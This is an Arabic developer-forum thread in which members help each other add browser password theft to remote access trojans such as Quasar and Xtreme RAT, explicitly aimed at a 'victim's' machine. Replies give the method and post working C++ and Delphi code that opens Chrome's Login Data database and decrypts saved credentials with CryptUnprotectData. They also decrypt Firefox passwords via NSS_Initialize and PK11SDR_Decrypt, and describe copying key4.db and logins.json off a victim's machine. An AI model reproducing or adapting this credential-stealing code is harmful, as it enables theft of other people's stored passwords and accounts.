تمت الإجابة سحب باسورد الضحية يختلف من على منصة 32 و 64

تم تحميل الصفحة في 0,5151574 ثانية
سحب باسورد الضحية يختلف من على منصة 32 و 64
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الغراب

Beginner Developer
rank
إنضم
1 أغسطس 2016
المشاركات
78
الإعجابات
27
النقاط
18
السلام عليكم و رحمة الله

أتمنى الحال بخير لكل أعضاء المنتدى العريق
أما بعد .... فسبق و سألت عن خاصية سحب الباسورد من الضحية

https://www.dev-point.com/vb/threads/686593/#post-6873148
و أنا أريد سورس بلغة الفيجوال بيسك
و اتضح أن خاصية ال Password recovery المتدوالة لا تشتغل على ويندوز 64
وجدت المعلومة في تعليق بمنتدى github

It's working fine, there is however 1 olddated thing I noticed in firefox to get the install path. But the problem is that it cannot get passwords from 64bit browsers since quasar is 32bit on its own, a 32bit process cannot load a 64bit dll

أتمنى اذا أحد الأخوة قادر على طرح حل لهذه المشكلة أن يقوم بالافادة
و بارك الله فيكم جميعا
مع العلم أنو برامج الاختراق بلغة ال Native لا تواجه أي صعوبة في امتصاص كل الباسوردات من على جهاز نواة 32 أو 64

 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
المشكلة في برامج الناتيف كما في الدوت نت

المشكلة إنه أغلب اللي بيسحبوا يقومون باسخدام مكتبة nss3.dll الموجودة مع الفايرفوكس
والمكتبة مكتوبة بالسي ومترجمة إما إلي 32 أو 64
ولا يمكن تشغيل أسمبلي 32 داخل 64 أو العكس لأن المعالج لن يفهمها
للاتفاف حول المشكلة يمكنك القيام بأحد أمرين
1 - تسخدم برنامج للسحب 64 وتقوم بحقن المكتبة 32 إن وجدت في عملية 32 وتستخدم دوالها من هناك وتجلب النواتج
عن طريق ipc لأن برامج 64 يمكنها حقن ملفات 32 ولا يمكن العكس لأن برامج 32 لا يمكنها حمل عناوين أكبر من تقريبا 2 جيجا
بينما عناوين 64 كبيرة جدا
2 - استخدم برنامج 32 وسيعمل علي أنظمة 32 و 64 وإذا وجدت الفايرفوكس 32 استخدم مكتبته
وإذا لم تجد فايرفوكس 32 قم بتحميل ملفات nss3.dll و لوازمها 32 بنفسك واستخدمها
لكن ستضطر لتحميل الكثير من الملفات كبيرة الحجم
 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
أو فكرة أفضل اصنع برنامجين واحد 32 للكروم والفايرفوكس والثاني 64 للفايرفوكس وادمجهم
والبرنامج 32 لو اكتشف انه الفايرفوكس 64 يشغل البرنامج الثاني
إن شاء الله أطبق الفكرة قريب
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,276
الإعجابات
8,307
النقاط
113
الإقامة
الجزائر
سوف اطرح لك سورس للامانة وجدته في اليويتوب مند مدة
نسيت اين وجدتة و هو من احسن الادوات لسحب كلمات السر
علي النواتين
تفضل و قم بدراسته ربما يفيدك
هنالك ملفات exe. < .gzip مدمجة بروسورس ، يبدو انها هي المسؤولة عن السحب (حسب فيروس توتال انها ادوات Nirsoft)
لاكن ربما غير امنة للاستعمال او ملغمة و بها اكواد خبيثة
 
التعديل الأخير بواسطة المشرف:
إنضم
24 فبراير 2018
المشاركات
285
الإعجابات
169
النقاط
43
هنالك ملفات exe. < .gzip مدمجة بروسورس ، يبدو انها هي المسؤولة عن السحب (حسب فيروس توتال انها ادوات Nirsoft)
لاكن ربما غير امنة للاستعمال او ملغمة و بها اكواد خبيثة
انا فاهم قصدك يمكنه تحليل كل ما يوجد في ريسورس و يفهم الالية لعملها
و اخد الاكواد التي تفيده
نرجع الي موضوع مهم بالنسبة لي و بما انك خبير دلفي
هل يمكنك اعطائي و لو تلميح عن سحب كلمات المرور من المتصفحات الحديثة
انا الان وصلت الي المرحلة الاخيرة في تعديل اكسترم رات من داخل السورس
و صراحة عجزت و فشلت في البحث عن كيفية سحب الباسوردات من المتصفحات
الحديثة و ما هي المكتبات التي يجب استدعائها
و لو تكرمت ان انت عملت له كومبايل من قبل و عدلت علي هده الخاصية
ترفع لي .pas الخاصة بالتعديل و اكون لك شاكر
 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
انا فاهم قصدك يمكنه تحليل كل ما يوجد في ريسورس و يفهم الالية لعملها
و اخد الاكواد التي تفيده
نرجع الي موضوع مهم بالنسبة لي و بما انك خبير دلفي
هل يمكنك اعطائي و لو تلميح عن سحب كلمات المرور من المتصفحات الحديثة
انا الان وصلت الي المرحلة الاخيرة في تعديل اكسترم رات من داخل السورس
و صراحة عجزت و فشلت في البحث عن كيفية سحب الباسوردات من المتصفحات
الحديثة و ما هي المكتبات التي يجب استدعائها
و لو تكرمت ان انت عملت له كومبايل من قبل و عدلت علي هده الخاصية
ترفع لي .pas الخاصة بالتعديل و اكون لك شاكر
لفك تشفير كوكيز وباسوردات الكروم CryptUnprotectData ولا تفك إلا علي نفس اليوزر
للفايركس تفك base64 وبعدها تستخدم دالة من nss3.dll لفك تشفير pcsk

وهناك طريقة أخري للحصول علي باسوردات الفايرفوكس
انسخ ملف key3.db و key4.db و logins.json وارفعهم لجهازك وضعهم في بروفايل الفايرفوكس
سيقوم الفايرفوكس بمعرفة الباسوردات ويمكنك بعدها استخدام إضافة متصفح للحصول علي الباسورد الخام غير المشفر
ونفس الأمر مع كوكيز الفايرفوكس لكن الكوكيز غير مشفر
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,276
الإعجابات
8,307
النقاط
113
الإقامة
الجزائر
انا فاهم قصدك يمكنه تحليل كل ما يوجد في ريسورس و يفهم الالية لعملها
و اخد الاكواد التي تفيده
نرجع الي موضوع مهم بالنسبة لي و بما انك خبير دلفي
هل يمكنك اعطائي و لو تلميح عن سحب كلمات المرور من المتصفحات الحديثة
انا الان وصلت الي المرحلة الاخيرة في تعديل اكسترم رات من داخل السورس
و صراحة عجزت و فشلت في البحث عن كيفية سحب الباسوردات من المتصفحات
الحديثة و ما هي المكتبات التي يجب استدعائها
و لو تكرمت ان انت عملت له كومبايل من قبل و عدلت علي هده الخاصية
ترفع لي .pas الخاصة بالتعديل و اكون لك شاكر
^
لفك تشفير كوكيز وباسوردات الكروم CryptUnprotectData ولا تفك إلا علي نفس اليوزر
للفايركس تفك base64 وبعدها تستخدم دالة من nss3.dll لفك تشفير pcsk

وهناك طريقة أخري للحصول علي باسوردات الفايرفوكس
انسخ ملف key3.db و key4.db و logins.json وارفعهم لجهازك وضعهم في بروفايل الفايرفوكس
سيقوم الفايرفوكس بمعرفة الباسوردات ويمكنك بعدها استخدام إضافة متصفح للحصول علي الباسورد الخام غير المشفر
ونفس الأمر مع كوكيز الفايرفوكس لكن الكوكيز غير مشفر
اليوتوب مكان غير امن و يستعمل للتلغيم

لمعرفة المزيد عن سحب الباسوردات ، تابع مواضيع و ردود الاخ يوسف فقد تكلم كثيراا في الموضوع
نتائج البحث
 
إنضم
24 فبراير 2018
المشاركات
285
الإعجابات
169
النقاط
43
لفك تشفير كوكيز وباسوردات الكروم CryptUnprotectData ولا تفك إلا علي نفس اليوزر
للفايركس تفك base64 وبعدها تستخدم دالة من nss3.dll لفك تشفير pcsk

وهناك طريقة أخري للحصول علي باسوردات الفايرفوكس
انسخ ملف key3.db و key4.db و logins.json وارفعهم لجهازك وضعهم في بروفايل الفايرفوكس
سيقوم الفايرفوكس بمعرفة الباسوردات ويمكنك بعدها استخدام إضافة متصفح للحصول علي الباسورد الخام غير المشفر
ونفس الأمر مع كوكيز الفايرفوكس لكن الكوكيز غير مشفر
شكر اخي علي الرد
ان قصدت سورس اكسترام رات 3.6
هو يسحب فقط من المتصفحات القديمة و اريد ان اجعله
يسحب من كل المتصفحات
اعرف ان هناك مكتبات ناقصة
و المشكلة اني غيرته بطريقتي و اصبحت استعمل الا دلفي واحد
استغنيت علي الدلفي 7 و كدلك يمكن عمل كومبايل له في اي نظام ويندوز
و دون استعمال دلفي 7
ادا انت عملت له كومبايل من قبل ستفهم كلامي
 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
شكر اخي علي الرد
ان قصدت سورس اكسترام رات 3.6
هو يسحب فقط من المتصفحات القديمة و اريد ان اجعله
يسحب من كل المتصفحات
اعرف ان هناك مكتبات ناقصة
و المشكلة اني غيرته بطريقتي و اصبحت استعمل الا دلفي واحد
استغنيت علي الدلفي 7 و كدلك يمكن عمل كومبايل له في اي نظام ويندوز
و دون استعمال دلفي 7
ادا انت عملت له كومبايل من قبل ستفهم كلامي
لا يهم اللغة المستعملة ، هذا ما تحتاجه للحصول عليها
sqlite متوفرة للكل لغات البرمجة
CryptUnprotectData متوفرة لكل لغات البرمجة
CryptStringToBinary لفك base64 متوفرة لكل لغات البرمجة
بعض دوال nss
NSS_Initialize PK11SDR_Decrypt
الاتنين دول يكفوا وممكن تزود لو عاوز

وهكذا يتم فك باوردات الفايرفوكس

C++:
unsigned char* DecryptFirefoxPasswords(FirefoxFunctions funcs,wstring profile, char *pass) {
    char* ansi_profile;
    int size = WideCharToMultiByte(CP_UTF8, 0, profile.c_str(), -1, 0, 0, 0, 0);
    ansi_profile = new char[size];
    WideCharToMultiByte(CP_UTF8, 0, profile.c_str(), -1, ansi_profile, size, 0, 0);
    if (!init) {
        if (funcs.NSS_Initialize(ansi_profile, "", "", SECMOD_DB, NSS_INIT_READONLY) != SECSuccess)
        {
            cout << "[!] error : can't init nss\n";
            getchar();
            getchar();
            exit(0);
        }
        init = true;
    }
    unsigned char* base64;
    DWORD len;
    CryptStringToBinaryA(pass, strlen(pass), CRYPT_STRING_BASE64, 0, &len, 0, 0);
    base64 = new unsigned char[len];
    auto res = CryptStringToBinaryA(pass, strlen(pass), CRYPT_STRING_BASE64, base64, &len, 0, 0);
    if (!res) {
        cout << "error : ";
        PrintError();
        cout << endl;
        getchar();
        getchar();
    }
    if (!base64) {
        cout << "[!] error : can't decode base64\n";
        return 0;
    }
    SECItem result, data;
    result.data = 0;
    result.len = 0;
    data.data = base64;
    data.len = len;
    if (funcs.PK11SDR_Decrypt(&data, &result, 0) != SECSuccess) {
        auto res = funcs.PK11SDR_Decrypt(&data, &result, 0);
        cout << "[!] error : can't decrypt the pass\n";
        cout << "error : " << res;
        return 0;
    }
    byte* stres = new byte[result.len];
    memcpy(stres, result.data, result.len);
    stres[result.len] = '\0';
    return stres;
}
 
إنضم
24 فبراير 2018
المشاركات
285
الإعجابات
169
النقاط
43
^

اليوتوب مكان غير امن و يستعمل للتلغيم

لمعرفة المزيد عن سحب الباسوردات ، تابع مواضيع و ردود الاخ يوسف فقد تكلم كثيراا في الموضوع
نتائج البحث
في ما يخص الدوت نت لا يوجد عندي مشكله
المشكلة في الدلفي
لكن لا يهم شكرا لك
لقد تكاسلت فقط
ساضعه في الارشيف هههه
ربما ساكمله في العام المقبل ان شاء الله
لا يهم فانا لا اخترق كان دلك مجرد تطوير و اخد خبرة
 
إنضم
24 فبراير 2018
المشاركات
285
الإعجابات
169
النقاط
43
لا يهم اللغة المستعملة ، هذا ما تحتاجه للحصول عليها
sqlite متوفرة للكل لغات البرمجة
CryptUnprotectData متوفرة لكل لغات البرمجة
CryptStringToBinary لفك base64 متوفرة لكل لغات البرمجة
بعض دوال nss
NSS_Initialize PK11SDR_Decrypt
الاتنين دول يكفوا وممكن تزود لو عاوز

وهكذا يتم فك باوردات الفايرفوكس

C++:
unsigned char* DecryptFirefoxPasswords(FirefoxFunctions funcs,wstring profile, char *pass) {
    char* ansi_profile;
    int size = WideCharToMultiByte(CP_UTF8, 0, profile.c_str(), -1, 0, 0, 0, 0);
    ansi_profile = new char[size];
    WideCharToMultiByte(CP_UTF8, 0, profile.c_str(), -1, ansi_profile, size, 0, 0);
    if (!init) {
        if (funcs.NSS_Initialize(ansi_profile, "", "", SECMOD_DB, NSS_INIT_READONLY) != SECSuccess)
        {
            cout << "[!] error : can't init nss\n";
            getchar();
            getchar();
            exit(0);
        }
        init = true;
    }
    unsigned char* base64;
    DWORD len;
    CryptStringToBinaryA(pass, strlen(pass), CRYPT_STRING_BASE64, 0, &len, 0, 0);
    base64 = new unsigned char[len];
    auto res = CryptStringToBinaryA(pass, strlen(pass), CRYPT_STRING_BASE64, base64, &len, 0, 0);
    if (!res) {
        cout << "error : ";
        PrintError();
        cout << endl;
        getchar();
        getchar();
    }
    if (!base64) {
        cout << "[!] error : can't decode base64\n";
        return 0;
    }
    SECItem result, data;
    result.data = 0;
    result.len = 0;
    data.data = base64;
    data.len = len;
    if (funcs.PK11SDR_Decrypt(&data, &result, 0) != SECSuccess) {
        auto res = funcs.PK11SDR_Decrypt(&data, &result, 0);
        cout << "[!] error : can't decrypt the pass\n";
        cout << "error : " << res;
        return 0;
    }
    byte* stres = new byte[result.len];
    memcpy(stres, result.data, result.len);
    stres[result.len] = '\0';
    return stres;
}
شكرا جزيلا لك لمحاولة مساعدتي
كل شئ موجود عندي هو يستعمل Mysqlite3.dll
و يحتاج تعديل فقط
شكرا لك مرة اخري
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,276
الإعجابات
8,307
النقاط
113
الإقامة
الجزائر
في ما يخص الدوت نت لا يوجد عندي مشكله
المشكلة في الدلفي
لكن لا يهم شكرا لك
لقد تكاسلت فقط
ساضعه في الارشيف هههه
ربما ساكمله في العام المقبل ان شاء الله
لا يهم فانا لا اخترق كان دلك مجرد تطوير و اخد خبرة
اوكي دلفي بسيط
الكروم مافي مشكلة اعتقد ، عل كل سيكون مشابه ل
كود:
  db := TSQLiteDatabase.Create('\AppData\Local\Google\Chrome\User Data\Default\Login Data');
  tablo := DB.GetTable('SELECT * FROM logins');
  While not tablo.EOF do
  begin
    DataStream := TMemoryStream.Create;
    DataStream := tablo.FieldAsBlob(tablo.FieldIndex['password_value']);
    Giren.pbData := DataStream.Memory;
    Giren.cbData := DataStream.Size;
    CryptUnProtectData(@Giren, nil,nil,nil,nil,0,@Cikan);
    SetString(sifre, PAnsiChar(Cikan.pbData), Cikan.cbData);
    Result := Result + tablo.FieldAsString(tablo.FieldIndex['origin_url']) + Delimitador;
    Result := Result + tablo.FieldAsString(tablo.FieldIndex['username_value']) + Delimitador;
    Result := Result + sifre + Delimitador + #13#10;
    Tablo.Next;
  end;
مشكلة الفيرفوكس ،هدا الكود الجديد لنسخ الفيرفوكس الحديثة
كود:
            uses
            encddecd;
            ...

            var
               buffer_array : tarray<system.byte>;
            ...

            buffer_array := decodebase64(password);
            encryptedsecitem.secitemdata := pansichar(buffer_array);
            encryptedsecitem.secitemlen := length (buffer_array);

            PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
شاهد الاكواد القديمة للفيرفوكس في الاكستريم و حدثها بالكود الجديد
 
إنضم
24 فبراير 2018
المشاركات
285
الإعجابات
169
النقاط
43
اوكي دلفي بسيط
الكروم مافي مشكلة اعتقد ، عل كل سيكون مشابه ل
كود:
  db := TSQLiteDatabase.Create('\AppData\Local\Google\Chrome\User Data\Default\Login Data');
  tablo := DB.GetTable('SELECT * FROM logins');
  While not tablo.EOF do
  begin
    DataStream := TMemoryStream.Create;
    DataStream := tablo.FieldAsBlob(tablo.FieldIndex['password_value']);
    Giren.pbData := DataStream.Memory;
    Giren.cbData := DataStream.Size;
    CryptUnProtectData(@Giren, nil,nil,nil,nil,0,@Cikan);
    SetString(sifre, PAnsiChar(Cikan.pbData), Cikan.cbData);
    Result := Result + tablo.FieldAsString(tablo.FieldIndex['origin_url']) + Delimitador;
    Result := Result + tablo.FieldAsString(tablo.FieldIndex['username_value']) + Delimitador;
    Result := Result + sifre + Delimitador + #13#10;
    Tablo.Next;
  end;
مشكلة الفيرفوكس ،هدا الكود الجديد لنسخ الفيرفوكس الحديثة
كود:
            uses
            encddecd;
            ...

            var
               buffer_array : tarray<system.byte>;
            ...

            buffer_array := decodebase64(password);
            encryptedsecitem.secitemdata := pansichar(buffer_array);
            encryptedsecitem.secitemlen := length (buffer_array);

            PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
شاهد الاكواد القديمة للفيرفوكس في الاكستريم و حدثها بالكود الجديد
شكرا جزيلا و ربي يعطيك ما تتمني
شكرا مرة اخري
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل